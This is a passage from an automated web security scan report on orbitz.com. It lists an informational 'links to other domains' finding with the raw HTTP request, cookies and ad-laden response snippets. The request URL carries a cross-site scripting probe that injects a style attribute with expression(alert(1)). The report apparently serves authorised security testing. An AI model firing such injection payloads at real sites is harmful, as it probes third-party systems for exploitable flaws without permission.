           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.347. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=CB0AF950B6D5C5B6B38D8A2135B646A7; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:35 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 186827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
</style>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA"></script>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796598&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.348. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
